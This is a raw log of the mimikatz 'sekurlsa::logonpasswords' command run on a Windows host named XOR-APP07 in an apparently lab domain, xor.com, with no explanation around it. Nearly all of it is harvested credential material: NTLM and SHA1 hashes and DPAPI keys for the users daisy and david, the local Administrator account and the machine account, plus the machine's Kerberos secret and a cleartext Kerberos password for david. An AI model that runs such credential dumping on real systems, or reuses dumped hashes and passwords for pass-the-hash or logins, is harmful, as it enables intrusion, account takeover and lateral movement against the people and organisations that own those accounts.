mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1179701 (00000000:00120035)
Session           : RemoteInteractive from 2
User Name         : daisy
Domain            : xor
Logon Server      : XOR-DC01
Logon Time        : 1/16/2021 6:43:12 AM
SID               : S-1-5-21-2293535422-227910474-3663383505-1119
        msv :
         [00000003] Primary
         * Username : daisy
         * Domain   : xor
         * NTLM     : f6084ca1a4905c45747d4bdcc1fcab84
         * SHA1     : f5988d2f98cefd7287db5db5e7368c5e5d66eb02
         * DPAPI    : fb1d27d76302f96f6a2faee0d62bd221
        tspkg :
        wdigest :
         * Username : daisy
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : daisy
         * Domain   : XOR.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1179635 (00000000:0011fff3)
Session           : RemoteInteractive from 2
User Name         : daisy
Domain            : xor
Logon Server      : XOR-DC01
Logon Time        : 1/16/2021 6:43:12 AM
SID               : S-1-5-21-2293535422-227910474-3663383505-1119
        msv :
         [00000003] Primary
         * Username : daisy
         * Domain   : xor
         * NTLM     : f6084ca1a4905c45747d4bdcc1fcab84
         * SHA1     : f5988d2f98cefd7287db5db5e7368c5e5d66eb02
         * DPAPI    : fb1d27d76302f96f6a2faee0d62bd221
        tspkg :
        wdigest :
         * Username : daisy
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : daisy
         * Domain   : XOR.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1159665 (00000000:0011b1f1)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/16/2021 6:43:10 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 1159425 (00000000:0011b101)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/16/2021 6:43:10 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 1158826 (00000000:0011aeaa)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/16/2021 6:43:10 AM
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 481942 (00000000:00075a96)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP07
Logon Server      : XOR-APP07
Logon Time        : 1/16/2021 5:36:07 AM
SID               : S-1-5-21-1156534744-3602754850-1958308471-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP07
         * NTLM     : fc4bdfdebbd2e7a9250f2a98a85aa8c8
         * SHA1     : 24b37e0942325bd7ae6ec6c69be3c88e377b85fc
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP07
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP07
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 66564 (00000000:00010404)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:04 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XOR-APP07$
Domain            : xor
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:03 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app07$
         * Domain   : XOR.COM
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 36387 (00000000:00008e23)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:03 PM
SID               :
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 408459 (00000000:00063b8b)
Session           : Batch from 0
User Name         : david
Domain            : xor
Logon Server      : XOR-DC01
Logon Time        : 1/16/2021 5:35:40 AM
SID               : S-1-5-21-2293535422-227910474-3663383505-1123
        msv :
         [00000003] Primary
         * Username : david
         * Domain   : xor
         * NTLM     : d4738e8c31d43e0147f27894a20e6683
         * SHA1     : b1c2b2c766e7ad7688029ebc42fbacabae7fba72
         * DPAPI    : b712cb5d0fb0bdf9530c115100e2b574
        tspkg :
        wdigest :
         * Username : david
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : david
         * Domain   : XOR.COM
         * Password : dsfdf34534tdfGDFG5rdgr
        ssp :
        credman :

Authentication Id : 0 ; 378889 (00000000:0005c809)
Session           : Interactive from 0
User Name         : Administrator
Domain            : XOR-APP07
Logon Server      : XOR-APP07
Logon Time        : 10/11/2020 4:50:22 PM
SID               : S-1-5-21-1156534744-3602754850-1958308471-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : XOR-APP07
         * NTLM     : fc4bdfdebbd2e7a9250f2a98a85aa8c8
         * SHA1     : 24b37e0942325bd7ae6ec6c69be3c88e377b85fc
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : XOR-APP07
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : XOR-APP07
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:04 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 66583 (00000000:00010417)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:04 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 3b49063782f2ec9e5d6985421a5fb0cd
         * SHA1     : c566e35d27202d58f6c4d31c99bcfd1b89f2a463
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 27 bc 25 c8 be a0 e2 ce 56 75 dc bd 2d 27 62 46 a6 cf 0e 55 9b f9 0a 6e aa 7f ee d7 8d f9 80 9e 82 ae cf 07 26 7a 1f 99 05 d8 0c 47 1e 95 e7 12 42 5a 2e 66 7f 0c 5d ef 6c 4b 41 c2 0f 21 2d 04 0a 95 42 f5 61 cb ae 06 aa 01 cc 09 ba 59 ac 83 fc 0f ee 9f 6b ca 8b 3d cf 5c 73 83 de 06 45 8d 18 82 d1 ad 62 f9 ed 1f e8 05 82 a9 5c 2f 75 86 01 b8 9b b5 4f 7c cd bd 0f b9 06 64 41 f0 85 68 3c 43 1e 95 8d 1a 53 2f 71 d8 ce 74 86 a3 ae fd bb b5 4a 12 a7 4d 37 3f b9 b2 0d 49 fb a1 24 2a a7 5a 47 3c 46 1e ed 16 33 61 70 2c b6 6e 29 63 fe 10 0a 39 82 d9 32 9c 63 25 85 75 4c b2 52 5a 9c 82 d6 35 e3 bb aa 69 1f e5 01 55 2a 15 e5 6c 70 01 f1 07 a4 92 bb 2f b9 1c 89 a3 a7 5b f5 0e 05 d6 c9 49 56 c9 ab 16 0f ac f6 53 08 b3 09 44
        ssp :
        credman :

Authentication Id : 0 ; 37516 (00000000:0000928c)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:03 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 37468 (00000000:0000925c)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:03 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XOR-APP07$
         * Domain   : xor
         * NTLM     : 489715d682d6067f2d58b83a9ddbe201
         * SHA1     : 08ef5474f45c1301c3bfd23e54161c2db4092ad2
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : XOR-APP07$
         * Domain   : xor.com
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XOR-APP07$
Domain            : xor
Logon Server      : (null)
Logon Time        : 10/11/2020 4:48:03 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XOR-APP07$
         * Domain   : xor
         * Password : (null)
        kerberos :
         * Username : xor-app07$
         * Domain   : XOR.COM
         * Password : 5c d3 92 4b 12 76 d2 70 36 ec 81 bf 5e 85 6c 44 36 d0 ac c1 a2 dc c4 77 07 8a bb d0 8c f0 92 99 03 6c 88 8b c6 a4 c5 c4 cf 88 4c 24 83 c2 fa a3 bf b8 dd cb c3 8f e0 2b da e5 af 90 f3 29 2f 3f fe 0d 99 9c 2c 30 f4 20 af 51 b0 62 6e 7b 0c 9e cc bd ae 62 77 95 90 4e 6a 15 2d 1b 84 1d ab 38 6d 0f f1 9a 22 e3 4b c5 62 1b 82 c1 d8 1f 04 96 8b d5 18 a6 9b e3 ba 1b 30 58 b1 73 22 aa 06 fd 65 e2 37 8c 2a 6b 16 10 f4 18 47 e3 59 1c 05 bd 85 62 af da e0 58 26 89 6b e7 ed 1f 32 eb a3 e7 14 22 3c 1d 39 08 c9 54 33 7b d3 42 e7 b4 f5 10 28 50 b7 05 4a 2f 50 87 de dd 43 35 3c 4d b2 25 fd c7 25 00 74 fb 9a d2 29 d3 4d bd 8b a3 48 7a d2 b9 ec ef 09 64 2d 92 fc 20 11 7f c6 ec ec a9 8b a5 ef 73 b0 5e 3a 87 1a 4d 08 c4 d2 71 94 de
        ssp :
        credman :